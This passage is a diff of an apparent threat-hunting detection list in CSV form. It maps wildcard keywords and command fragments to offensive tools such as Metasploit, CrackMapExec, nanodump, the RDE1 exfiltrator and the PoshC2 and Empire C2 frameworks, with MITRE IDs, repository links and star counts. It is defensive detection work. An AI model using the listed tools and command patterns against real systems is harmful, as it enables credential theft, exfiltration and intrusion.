@@ "*cp sliver-* /opt/tools/bin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*cpp_test_payload.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*Cr3dOv3r*","offensive_tool_keyword","Cr3dOv3r","Know the dangers of credential reuse attacks.","T1110 - T1555 - T1003","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/D4Vinci/Cr3dOv3r","1","1","N/A","N/A","10","1902","437","2019-03-28T14:53:38Z","2017-11-13T20:49:57Z" -"*cracf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*crack_databases.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*crack_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*cracf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*crack_databases.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*crack_windows.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Crack-allDBs.git*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*Crack-allDBs-main*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*crack-allDBs-v1.py*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*crack-allDBs-v2.py*","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","8","1","50","19","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z" "*crackhound.py --verbose --password * --plain-text * --domain * --file * --add-password *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*cracklord-master.*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" -"*cracklord-queued*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" -"*cracklord-resourced*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" -"*crackmapexec*","offensive_tool_keyword","crackmapexec","crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*CrackMapExec*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*crackmapexec.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*crackmapexec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*crackmapexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*crackmapexec.spec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*cracklord-master.*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*cracklord-queued*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*cracklord-resourced*_amd64.deb*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*crackmapexec*","offensive_tool_keyword","crackmapexec","crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*CrackMapExec*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*crackmapexec.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*crackmapexec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*crackmapexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*crackmapexec.spec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*crackpkcs12*","offensive_tool_keyword","crackpkcs12","A multithreaded program to crack PKCS#12 files (p12 and pfx extensions) by Aestu","T1110 - T1185 - T1114","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/crackpkcs12/crackpkcs12","1","1","N/A","N/A","2","118","26","2019-04-26T18:38:11Z","2015-03-19T22:26:17Z" "*crackTGS*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","0","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*Crassus.csproj*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*Crassus.exe*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" "*Crassus.sln*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" -"*crate::modules::{rec2mastodon,rec2virustotal}*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*CravateRouge/autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" -"*CravateRouge/bloodyAD*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-09-01T09:12:45Z","2021-10-11T15:07:26Z" +"*crate::modules::{rec2mastodon,rec2virustotal}*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*CravateRouge/autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*CravateRouge/bloodyAD*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" "*crawlLdrDllList*","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","253","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" -"*crde dns -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*crde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*crde::utils::checker*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*crde_x64.exe dns -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*crde_x64.exe https -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*crde dns -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*crde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*crde::utils::checker*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*crde_x64.exe dns -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*crde_x64.exe https -f *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*CREATE DATABASE C2;*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*create_dummy_dll_file*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*create_protected_process_as_user*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*create-aws-instance.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*CreateC2Dialog.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*CreateC2Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*createdaisypayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*createlinuxpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Create-MultipleSessions.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Create-NamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*createnewpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 